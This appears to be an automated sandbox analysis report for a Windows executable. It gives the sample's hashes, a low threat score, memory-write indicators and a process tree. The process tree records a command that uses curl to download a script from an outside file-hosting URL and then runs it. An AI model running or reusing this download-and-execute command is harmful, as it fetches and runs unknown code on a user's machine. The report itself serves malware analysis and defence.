10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13

Analysis

max time kernel
139s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
17/11/2023, 10:55

Target

10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe
Size

1.9MB
MD5

49224dedd631dcb90428829dfcb6d4b7
SHA1

6bf03412f2814ed09a0040aa80a3a5b1a4357c74
SHA256

10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13
SHA512

7dd9e1132b3410b6bd0b8bf0172ceac91b27269fb5185172353a1bde8a9f6b3c5b5fbf094c2088972ebccd5fa233ed0de9b06c59d538f4005977a3f04b548e65
SSDEEP

24576:p2masH62sgIUxGVmLHrrCve4D+Ec0xMkH8JsU3Ao7qqIpWsRb3:AmasH6eIUxGere24yqqIpWsRb3

Score

1^/10

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4932 wrote to memory of 4332	4932	10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe	89
PID 4932 wrote to memory of 4332	4932	10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe	89
PID 4332 wrote to memory of 860	4332	cmd.exe	90
PID 4332 wrote to memory of 860	4332	cmd.exe	90
PID 860 wrote to memory of 4732	860	cmd.exe	91
PID 860 wrote to memory of 4732	860	cmd.exe	91

C:\Users\Admin\AppData\Local\Temp\10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe
"C:\Users\Admin\AppData\Local\Temp\10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /c "curl https://vip.123pan.cn/1814328088/gtx/2 -o %HOMEPATH%\2.cmd&%HOMEPATH%\2.cmd"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4332
- - C:\Windows\system32\cmd.exe
    cmd /c "curl https://vip.123pan.cn/1814328088/gtx/2 -o \Users\Admin\2.cmd&\Users\Admin\2.cmd"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:860
  - - C:\Windows\system32\curl.exe
      curl https://vip.123pan.cn/1814328088/gtx/2 -o \Users\Admin\2.cmd
      4⤵
      PID:4732

memory/4932-0-0x0000000000400000-0x0000000000504000-memory.dmp

Filesize
1.0MB

Download